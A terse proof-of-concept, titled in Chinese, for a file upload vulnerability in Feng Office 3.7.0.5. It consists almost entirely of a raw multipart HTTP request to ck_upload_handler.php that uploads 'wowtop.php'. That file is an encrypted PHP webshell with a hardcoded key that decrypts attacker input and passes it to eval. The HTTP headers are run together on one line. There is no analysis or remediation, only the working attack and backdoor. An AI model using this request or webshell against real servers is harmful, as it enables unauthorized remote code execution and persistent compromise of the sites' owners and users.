Feng Office 3.7.0.5文件上传漏洞

POST /ck_upload_handler.php HTTP/1.1Host: <IP>Content-Length: 791Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: <IP>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE7DSCkF65FIKmwixUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: <IP>Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
------WebKitFormBoundaryE7DSCkF65FIKmwixContent-Disposition: form-data; name="upload"; filename="wowtop.php"Content-Type: application/octet-stream
<?php@error_reporting(0);session_start();    $key="e45e329feb5d925b";  $_SESSION['k']=$key;  session_write_close();  $post=file_get_contents("php://input");  if(!extension_loaded('openssl'))  {    $t="base64_"."decode";    $post=$t($post."");        for($i=0;$i<strlen($post);$i++) {           $post[$i] = $post[$i]^$key[$i+1&15];           }  }  else  {    $post=openssl_decrypt($post, "AES128", $key);  }    $arr=explode('|',$post);    $func=$arr[0];    $params=$arr[1];  class C{public function __invoke($p) {eval($p."");}}    @call_user_func(new C(),$params);?>
------WebKitFormBoundaryE7DSCkF65FIKmwix--